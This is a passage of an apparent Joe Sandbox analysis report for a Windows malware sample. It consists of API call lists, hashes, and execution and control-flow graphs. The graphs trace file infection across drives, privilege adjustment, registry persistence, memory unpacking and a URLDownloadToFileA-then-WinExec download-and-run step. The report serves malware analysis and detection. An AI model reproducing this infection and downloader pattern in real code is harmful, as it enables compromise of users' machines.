                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: list<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-4027344264
                                                                                                                                                                                                                          • Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: deque<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-309773918
                                                                                                                                                                                                                          • Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 803148776-1018135373
                                                                                                                                                                                                                          • Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:31.9%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                                                                                                                          Signature Coverage:9.4%
                                                                                                                                                                                                                          Total number of Nodes:297
                                                                                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                                                                                          execution_graph 1020 6114e1 1021 611541 1020->1021 1022 6114fd GetModuleHandleA 1020->1022 1025 611573 1021->1025 1026 611549 1021->1026 1023 611512 1022->1023 1024 61151a VirtualQuery 1022->1024 1023->1021 1024->1023 1031 611638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1025->1031 1027 611566 1026->1027 1048 611af9 1026->1048 1029 611579 ExitProcess 1032 61167a 1031->1032 1033 61167f 1031->1033 1066 61139f GetVersionExA 1032->1066 1054 611718 GetSystemTimeAsFileTime 1033->1054 1036 611686 1037 6116ca 1036->1037 1040 6116a0 CreateThread 1036->1040 1038 6116d0 1037->1038 1039 6116d7 1037->1039 1087 611581 1038->1087 1042 6116dd lstrcpy 1039->1042 1043 61170f 1039->1043 1059 612c48 memset 1040->1059 1303 611099 1040->1303 1042->1029 1043->1029 1047 611718 3 API calls 1047->1037 1049 611b11 1048->1049 1050 611b09 1048->1050 1052 611b16 CreateThread 1049->1052 1053 611b0f 1049->1053 1051 611638 188 API calls 1050->1051 1051->1053 1052->1053 1322 611638 189 API calls 1052->1322 1053->1027 1053->1053 1055 611735 SHSetValueA 1054->1055 1056 611754 1054->1056 1058 611786 __aulldiv 1055->1058 1057 61175a SHGetValueA 1056->1057 1056->1058 1057->1058 1058->1036 1093 611973 PathFileExistsA 1059->1093 1061 612cb2 1064 6116ba WaitForSingleObject 1061->1064 1065 612cbb VirtualFree 1061->1065 1063 612c8f CreateThread WaitForMultipleObjects 1063->1061 1115 612b8c memset GetLogicalDriveStringsA 1063->1115 1064->1047 1065->1064 1067 6114da 1066->1067 1068 6113cf LookupPrivilegeValueA 1066->1068 1067->1033 1069 6113e7 1068->1069 1071 6113ef 1068->1071 1283 61119f GetCurrentProcess OpenProcessToken 1069->1283 1071->1067 1288 61120e GetModuleHandleA GetProcAddress 1071->1288 1076 611448 GetCurrentProcessId 1076->1067 1077 611457 1076->1077 1077->1067 1078 611319 3 API calls 1077->1078 1079 61147f 1078->1079 1080 611319 3 API calls 1079->1080 1081 61148e 1080->1081 1081->1067 1082 611319 3 API calls 1081->1082 1083 6114b4 1082->1083 1084 611319 3 API calls 1083->1084 1085 6114c3 1084->1085 1086 611319 3 API calls 1085->1086 1086->1067 1302 61185b GetSystemTimeAsFileTime srand rand srand rand 1087->1302 1089 611592 wsprintfA wsprintfA lstrlen CreateFileA 1090 611633 1089->1090 1091 6115fb WriteFile CloseHandle 1089->1091 1090->1043 1091->1090 1092 61161d ShellExecuteA 1091->1092 1092->1090 1094 6119a0 1093->1094 1096 611ac7 1093->1096 1095 6119af CreateFileA 1094->1095 1097 6119c4 Sleep 1095->1097 1098 611a28 GetFileSize 1095->1098 1096->1061 1096->1063 1097->1095 1099 6119d5 1097->1099 1100 611a38 1098->1100 1111 611a80 1098->1111 1114 61185b GetSystemTimeAsFileTime srand rand srand rand 1099->1114 1104 611a3d VirtualAlloc 1100->1104 1100->1111 1101 611a96 1105 611aad 1101->1105 1106 611a9c DeleteFileA 1101->1106 1102 611a8d FindCloseChangeNotification 1102->1101 1108 611a53 1104->1108 1104->1111 1105->1096 1113 611ab8 VirtualFree 1105->1113 1106->1105 1107 6119da wsprintfA CopyFileA 1107->1098 1110 611a0d CreateFileA 1107->1110 1108->1111 1112 611a59 ReadFile 1108->1112 1110->1098 1110->1106 1111->1101 1111->1102 1112->1108 1112->1111 1113->1096 1114->1107 1116 612c09 WaitForMultipleObjects 1115->1116 1121 612bc8 1115->1121 1118 612c2a CreateThread 1116->1118 1119 612c3c 1116->1119 1117 612bfa lstrlen 1117->1116 1117->1121 1118->1119 1126 612845 1118->1126 1120 612bd2 GetDriveTypeA 1120->1117 1120->1121 1121->1117 1121->1120 1122 612be3 CreateThread 1121->1122 1122->1117 1123 612b7d 1122->1123 1136 6129e2 memset wsprintfA 1123->1136 1273 61274a memset memset SHGetSpecialFolderPathA wsprintfA 1126->1273 1128 612878 DeleteFileA 1129 61289a 1128->1129 1130 61288c VirtualFree 1128->1130 1131 6128a4 CloseHandle 1129->1131 1132 6128ab 1129->1132 1130->1129 1131->1132 1133 612692 8 API calls 1134 612853 1133->1134 1134->1128 1134->1133 1135 61239d 186 API calls 1134->1135 1135->1134 1137 612a3a memset lstrlen lstrcpyn strrchr 1136->1137 1138 612abc memset memset FindFirstFileA 1136->1138 1137->1138 1139 612a88 1137->1139 1150 6128b8 memset wsprintfA 1138->1150 1139->1138 1141 612a9a lstrcmpiA 1139->1141 1143 612b74 1141->1143 1144 612aad lstrlen 1141->1144 1144->1138 1144->1141 1145 612b61 FindNextFileA 1146 612b23 1145->1146 1147 612b6d FindClose 1145->1147 1148 612b35 lstrcmpiA 1146->1148 1149 6128b8 174 API calls 1146->1149 1147->1143 1148->1146 1148->1147 1149->1145 1151 612905 1150->1151 1156 612951 memset 1150->1156 1152 612956 strrchr 1151->1152 1153 61291b memset wsprintfA 1151->1153 1151->1156 1155 612967 lstrcmpiA 1152->1155 1152->1156 1154 6129e2 180 API calls 1153->1154 1154->1156 1157 612988 lstrcmpiA 1155->1157 1158 61297a 1155->1158 1156->1145 1157->1156 1159 612994 1157->1159 1168 611e6e 1158->1168 1161 6129ad strstr 1159->1161 1162 6129a5 lstrcpy 1159->1162 1163 6129d3 1161->1163 1164 6129cb 1161->1164 1162->1161 1233 612692 1163->1233 1211 61239d strstr 1164->1211 1169 611e7d 1168->1169 1242 611df6 strrchr 1169->1242 1172 611eb0 SetFileAttributesA CreateFileA 1173 612332 1172->1173 1174 611edf 1172->1174 1176 612346 1173->1176 1177 61233d UnmapViewOfFile 1173->1177 1247 611915 1174->1247 1178 612350 1176->1178 1179 61234b FindCloseChangeNotification 1176->1179 1177->1176 1181 612391 1178->1181 1182 612356 CloseHandle 1178->1182 1179->1178 1181->1156 1182->1181 1183 611f2e 1183->1173 1253 611c81 1183->1253 1187 611f92 1188 611c81 2 API calls 1187->1188 1189 611f9f 1188->1189 1189->1173 1190 611af9 169 API calls 1189->1190 1191 612024 1189->1191 1195 611fc0 1190->1195 1191->1173 1192 611af9 169 API calls 1191->1192 1193 61207a 1192->1193 1194 611af9 169 API calls 1193->1194 1199 612090 1194->1199 1195->1173 1195->1191 1196 611af9 169 API calls 1195->1196 1197 611ffe 1196->1197 1198 612013 FlushViewOfFile 1197->1198 1198->1191 1200 6120bb memset memset 1199->1200 1201 6120f5 1200->1201 1202 611c81 2 API calls 1201->1202 1203 6121de 1202->1203 1204 612226 memcpy UnmapViewOfFile CloseHandle 1203->1204 1258 611b8a 1204->1258 1206 61226e 1266 61185b GetSystemTimeAsFileTime srand rand srand rand 1206->1266 1208 6122ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1209 611915 3 API calls 1208->1209 1210 61231f FindCloseChangeNotification 1209->1210 1210->1173 1212 612451 CreateFileA GetFileSize 1211->1212 1218 6123d8 1211->1218 1213 612480 1212->1213 1214 612675 CloseHandle 1212->1214 1213->1214 1216 612499 1213->1216 1215 61267c RemoveDirectoryA 1214->1215 1217 612687 1215->1217 1219 611915 3 API calls 1216->1219 1217->1156 1218->1212 1218->1217 1220 6124a4 9 API calls 1219->1220 1268 61189d memset CreateProcessA 1220->1268 1223 61255c Sleep memset wsprintfA 1224 6129e2 163 API calls 1223->1224 1225 612597 memset wsprintfA Sleep 1224->1225 1226 61189d 6 API calls 1225->1226 1227 6125e4 Sleep CreateFileA 1226->1227 1228 611915 3 API calls 1227->1228 1229 612610 CloseHandle 1228->1229 1229->1215 1230 61261e 1229->1230 1230->1215 1231 612641 SetFilePointer WriteFile 1230->1231 1231->1215 1232 612667 SetEndOfFile 1231->1232 1232->1215 1234 6126b2 WaitForSingleObject 1233->1234 1235 6126a2 CreateEventA 1233->1235 1236 6126c1 lstrlen ??2@YAPAXI 1234->1236 1237 612708 1234->1237 1235->1234 1238 612736 SetEvent 1236->1238 1239 6126da lstrcpy 1236->1239 1237->1238 1240 612718 lstrcpy ??3@YAXPAX 1237->1240 1238->1156 1241 6126f1 1239->1241 1240->1241 1241->1238 1243 611e13 lstrcpy strrchr 1242->1243 1244 611e62 1242->1244 1243->1244 1245 611e40 lstrcmpiA 1243->1245 1244->1172 1244->1173 1245->1244 1246 611e52 lstrlen 1245->1246 1246->1244 1246->1245 1248 611928 1247->1248 1251 611924 SetFilePointer CreateFileMappingA MapViewOfFile 1247->1251 1249 61194f 1248->1249 1250 61192e memset GetFileTime 1248->1250 1249->1251 1252 611954 SetFileTime 1249->1252 1250->1251 1251->1173 1251->1183 1252->1251 1254 611c9c 1253->1254 1256 611c94 1253->1256 1255 611cae memset memset 1254->1255 1254->1256 1255->1256 1256->1173 1257 61185b GetSystemTimeAsFileTime srand rand srand rand 1256->1257 1257->1187 1259 611b93 1258->1259 1267 61185b GetSystemTimeAsFileTime srand rand srand rand 1259->1267 1261 611bca srand 1262 611bd8 rand 1261->1262 1263 611c08 1262->1263 1263->1262 1264 611c29 memset memcpy lstrcat 1263->1264 1264->1206 1266->1208 1267->1261 1269 6118e0 CloseHandle WaitForSingleObject 1268->1269 1270 61190c 1268->1270 1271 611907 CloseHandle 1269->1271 1272 6118fb GetExitCodeProcess 1269->1272 1270->1215 1270->1223 1271->1270 1272->1271 1282 61185b GetSystemTimeAsFileTime srand rand srand rand 1273->1282 1275 6127b5 wsprintfA CopyFileA 1276 612840 1275->1276 1277 6127de wsprintfA 1275->1277 1276->1134 1278 611973 17 API calls 1277->1278 1279 61280f 1278->1279 1280 612820 CreateFileA 1279->1280 1281 612813 DeleteFileA 1279->1281 1280->1276 1281->1280 1282->1275 1284 611200 CloseHandle 1283->1284 1285 6111c6 AdjustTokenPrivileges 1283->1285 1284->1071 1286 6111f7 CloseHandle 1285->1286 1287 6111f6 1285->1287 1286->1284 1287->1286 1289 611310 1288->1289 1290 61123f GetCurrentProcessId OpenProcess 1288->1290 1289->1067 1297 611319 1289->1297 1290->1289 1293 611262 1290->1293 1291 6112b0 VirtualAlloc 1291->1293 1296 6112b8 1291->1296 1292 6112f1 CloseHandle 1292->1289 1294 611302 VirtualFree 1292->1294 1293->1291 1293->1292 1295 611296 VirtualFree 1293->1295 1293->1296 1294->1289 1295->1291 1296->1292 1298 61134a 1297->1298 1299 61132a GetModuleHandleA GetProcAddress 1297->1299 1300 611351 memset 1298->1300 1301 611363 1298->1301 1299->1298 1299->1301 1300->1301 1301->1067 1301->1076 1302->1089 1304 611196 1303->1304 1305 6110ba 1303->1305 1305->1304 1321 61185b GetSystemTimeAsFileTime srand rand srand rand 1305->1321 1307 611118 wsprintfA wsprintfA URLDownloadToFileA 1308 611168 lstrlen Sleep 1307->1308 1309 6110dc 1307->1309 1308->1305 1312 611000 CreateFileA 1309->1312 1313 611092 WinExec lstrlen 1312->1313 1314 611025 GetFileSize CreateFileMappingA MapViewOfFile 1312->1314 1313->1304 1313->1305 1315 611057 1314->1315 1316 61107b 1314->1316 1319 611061 1315->1319 1320 611074 UnmapViewOfFile 1315->1320 1317 611087 CloseHandle 1316->1317 1318 61108d CloseHandle 1316->1318 1317->1318 1318->1313 1319->1320 1320->1316 1321->1307 1349 612361 1350 612374 1349->1350 1351 61236b UnmapViewOfFile 1349->1351 1352 612382 1350->1352 1353 612379 CloseHandle 1350->1353 1351->1350 1354 612391 1352->1354 1355 612388 CloseHandle 1352->1355 1353->1352 1355->1354 1356 616014 1357 616035 GetModuleHandleA 1356->1357 1358 61605f 1356->1358 1359 61604d GetProcAddress 1357->1359 1360 616058 1359->1360 1360->1358 1360->1359 1360->1360 1323 616076 1324 6160c7 1323->1324 1325 61607b 1323->1325 1326 61615f VirtualFree 1324->1326 1328 616198 VirtualFree 1324->1328 1329 6160d5 VirtualAlloc 1324->1329 1325->1324 1327 6160b0 VirtualAlloc 1325->1327 1335 6161b2 1325->1335 1326->1324 1327->1324 1328->1335 1329->1324 1330 616389 VirtualProtect 1333 6163b7 1330->1333 1331 6163fc VirtualProtect 1332 616400 1331->1332 1333->1331 1334 6163e7 VirtualProtect 1333->1334 1334->1331 1334->1333 1335->1330 1336 6162fb 1335->1336 1337 616159 VirtualFree 1342 6160c7 1337->1342 1338 616198 VirtualFree 1340 6161b2 1338->1340 1339 6160d5 VirtualAlloc 1339->1342 1341 616389 VirtualProtect 1340->1341 1348 6162fb 1340->1348 1346 6163b7 1341->1346 1342->1338 1342->1339 1344 61615f VirtualFree 1342->1344 1343 6163fc VirtualProtect 1345 616400 1343->1345 1344->1342 1346->1343 1347 6163e7 VirtualProtect 1346->1347 1347->1343 1347->1346

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_006114E1 12 Function_00611AF9 0->12 29 Function_00611638 0->29 1 Function_00612361 50 Function_00612D9B 1->50 2 Function_00612D60 3 Function_00616B63 23 Function_006167A4 3->23 25 Function_006169B0 3->25 26 Function_00616834 3->26 4 Function_006129E2 28 Function_006128B8 4->28 5 Function_00611C68 6 Function_00611E6E 6->2 6->5 11 Function_00611DF6 6->11 6->12 21 Function_0061185B 6->21 31 Function_00611C81 6->31 37 Function_00611D8A 6->37 38 Function_00611B8A 6->38 45 Function_00611915 6->45 6->50 7 Function_00612CF0 8 Function_00611973 8->21 9 Function_00616CF2 13 Function_00616CF8 9->13 10 Function_00616076 17 Function_006166C8 10->17 12->29 14 Function_00612B7D 14->4 15 Function_00612845 18 Function_0061274A 15->18 43 Function_00612692 15->43 51 Function_0061239D 15->51 16 Function_00612C48 16->8 40 Function_00612B8C 16->40 34 Function_00616D00 17->34 35 Function_00616B02 17->35 36 Function_00616A84 17->36 18->8 18->21 19 Function_006117D0 20 Function_00616159 20->17 22 Function_0061235D 24 Function_006165A6 27 Function_00616734 27->34 27->35 27->36 28->4 28->6 28->43 28->51 29->16 29->19 32 Function_00611581 29->32 47 Function_00611099 29->47 49 Function_00611718 29->49 54 Function_0061139F 29->54 30 Function_00616001 39 Function_0061600A 30->39 32->21 33 Function_00611000 33->19 34->3 34->9 34->25 35->3 36->9 41 Function_0061680F 36->41 38->21 40->14 40->15 42 Function_0061120E 44 Function_00616012 46 Function_00616014 47->21 47->33 48 Function_00611319 49->7 51->4 51->45 52 Function_0061189D 51->52 53 Function_0061119F 54->42 54->48 54->53

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 101 6129e2-612a34 memset wsprintfA 102 612a3a-612a86 memset lstrlen lstrcpyn strrchr 101->102 103 612abc-612b21 memset * 2 FindFirstFileA call 6128b8 memset 101->103 102->103 104 612a88-612a98 102->104 110 612b61-612b6b FindNextFileA 103->110 104->103 106 612a9a-612aa7 lstrcmpiA 104->106 108 612b74-612b7a 106->108 109 612aad-612aba lstrlen 106->109 109->103 109->106 111 612b23-612b2a 110->111 112 612b6d-612b6e FindClose 110->112 113 612b4c-612b5c call 6128b8 111->113 114 612b2c-612b33 111->114 112->108 113->110 114->113 115 612b35-612b4a lstrcmpiA 114->115 115->112 115->113
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                                                                                                                                                          • String ID: %s*$C:\$Documents and Settings
                                                                                                                                                                                                                          • API String ID: 2826467728-110786608
                                                                                                                                                                                                                          • Opcode ID: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                                                                                                                                                                                          • Instruction ID: 36a9edbd0ef466ab30e62cd0397264d21bed5f24fd678e045e9ef842dd68c828
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C4186B240434AAFD720DFA0DC89DDB77EDEB84315F08482AF545D3211E634D69887A6

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 216 611718-611733 GetSystemTimeAsFileTime 217 611735-611752 SHSetValueA 216->217 218 611754-611758 216->218 219 6117c6-6117cd 217->219 218->219 220 61175a-611784 SHGetValueA 218->220 220->219 221 611786-6117b3 call 612cf0 * 2 220->221 221->219 226 6117b5 221->226 227 6117b7-6117bd 226->227 228 6117bf 226->228 227->219 227->228 228->219
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611729
                                                                                                                                                                                                                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0061174C
                                                                                                                                                                                                                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0061177C
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00611796
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 006117A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TimeValue__aulldiv$FileSystem
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SOFTWARE\GTplus$Time
                                                                                                                                                                                                                          • API String ID: 541852442-3754639035
                                                                                                                                                                                                                          • Opcode ID: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                                                                                                                                                                                          • Instruction ID: 6bc131a6a4fe29481fbab03d04caf538678dbf6b995c0e8f1b879f62585c7812
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E115B75A00219BBDF109B94CC86FEF7BBEEB45B14F148115FA01F6380D6719A84C764

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 229 616076-616079 230 6160e0-6160eb 229->230 231 61607b-616080 229->231 234 6160ee-6160f4 230->234 232 616082-616085 231->232 233 6160f7-6160f8 231->233 235 6160f6 232->235 238 616087 232->238 236 6160fa-6160fc call 6166c8 233->236 237 6160fe-616106 233->237 234->235 235->233 236->237 240 616155-616189 VirtualFree 237->240 241 616108-61611d 237->241 238->234 242 616089-616095 238->242 247 61618c-616192 240->247 244 61611f-616121 241->244 245 6160a1-6160aa 242->245 246 616097-61609f 242->246 248 616151-616154 244->248 249 616123 244->249 250 6160b0-6160c1 VirtualAlloc 245->250 251 6161ba-6161c8 245->251 246->245 252 6160c7-6160cf 247->252 253 616198-6161b0 VirtualFree 247->253 248->240 249->248 256 616125-616128 249->256 250->252 254 616243-616251 251->254 255 6161ca-6161d7 251->255 252->247 263 6160d5-6160df VirtualAlloc 252->263 253->251 259 6161b2-6161b4 253->259 257 616253 254->257 258 616264-61626f 254->258 260 6161dd-6161e0 255->260 261 616134-61613b 256->261 262 61612a-61612e 256->262 264 616255-616258 257->264 265 616271-616276 258->265 259->251 260->254 266 6161e2-6161f2 260->266 273 616130-616132 261->273 274 61613d-61614f 261->274 262->261 262->273 263->230 264->258 269 61625a-616262 264->269 270 616389-6163b1 VirtualProtect 265->270 271 61627c-616289 265->271 272 6161f5-6161fe 266->272 269->264 277 6163b7-6163ba 270->277 287 616292-616298 271->287 288 61628b 271->288 275 616200-616203 272->275 276 61620c-616219 272->276 273->244 274->244 279 616205-616208 275->279 280 61621b-616228 275->280 281 616238-61623f 276->281 282 6163fc-6163ff VirtualProtect 277->282 283 6163bc-6163c2 277->283 289 61622a-616236 279->289 290 61620a 279->290 280->281 281->272 285 616241 281->285 286 616400-616416 282->286 283->283 284 6163c4 283->284 284->282 291 6163c6-6163cf 284->291 285->260 292 616420-616425 286->292 293 616418-61641d 286->293 294 6162a2-6162ac 287->294 288->287 289->281 290->281 295 6163d1 291->295 296 6163d4-6163d8 291->296 297 6162b1-6162c8 294->297 298 6162ae 294->298 295->296 301 6163da 296->301 302 6163dd-6163e1 296->302 299 616373-616384 297->299 300 6162ce-6162d4 297->300 298->297 299->265 303 6162d6-6162d9 300->303 304 6162da-6162f1 300->304 301->302 305 6163e3 302->305 306 6163e7-6163fa VirtualProtect 302->306 303->304 308 6162f3-6162f9 304->308 309 616365-61636e 304->309 305->306 306->277 306->282 310 616314-616326 308->310 311 6162fb-61630f 308->311 309->294 313 616328-61634a 310->313 314 61634c-616360 310->314 312 616426-6164a9 311->312 323 616519-61651c 312->323 324 6164ab-6164c0 312->324 313->309 314->312 325 616583-616587 323->325 326 61651d-61651e 323->326 330 6164c2 324->330 331 616535-616537 324->331 328 616588-61658b 325->328 329 616522-616533 326->329 332 6165a1-6165a3 328->332 333 61658d-61658f 328->333 329->331 336 6164c5-6164cd 330->336 337 6164f8 330->337 334 616539 331->334 335 61659a 331->335 340 616591-616593 333->340 341 6165b4 334->341 342 61653b-616541 334->342 343 61659b-61659d 335->343 344 616542-616545 336->344 345 6164cf-6164d4 336->345 338 6164fa-6164fe 337->338 339 61656c-61656f 337->339 351 616500 338->351 352 616572 338->352 339->352 340->343 353 616595 340->353 350 6165be-6165db 341->350 342->344 343->340 346 61659f 343->346 347 61654d-616550 344->347 348 616517-616518 345->348 349 6164d6-6164d9 345->349 346->328 347->350 354 616552-616556 347->354 348->323 349->347 355 6164db-6164f5 349->355 361 6165dd-6165f6 350->361 351->329 357 616502 351->357 358 616573-616576 352->358 353->335 359 616578-61657a 354->359 360 616558-616569 354->360 355->337 357->358 362 616504-616513 357->362 358->359 359->361 364 61657c 359->364 360->339 363 6165f7-616608 361->363 362->331 365 616515 362->365 364->363 366 61657e-61657f 364->366 365->348 366->325
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 006160BE
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                                          • Opcode ID: b35c354bb450e97f0d3d56b74ab2f857cdc5695473b555c91f8392088d510090
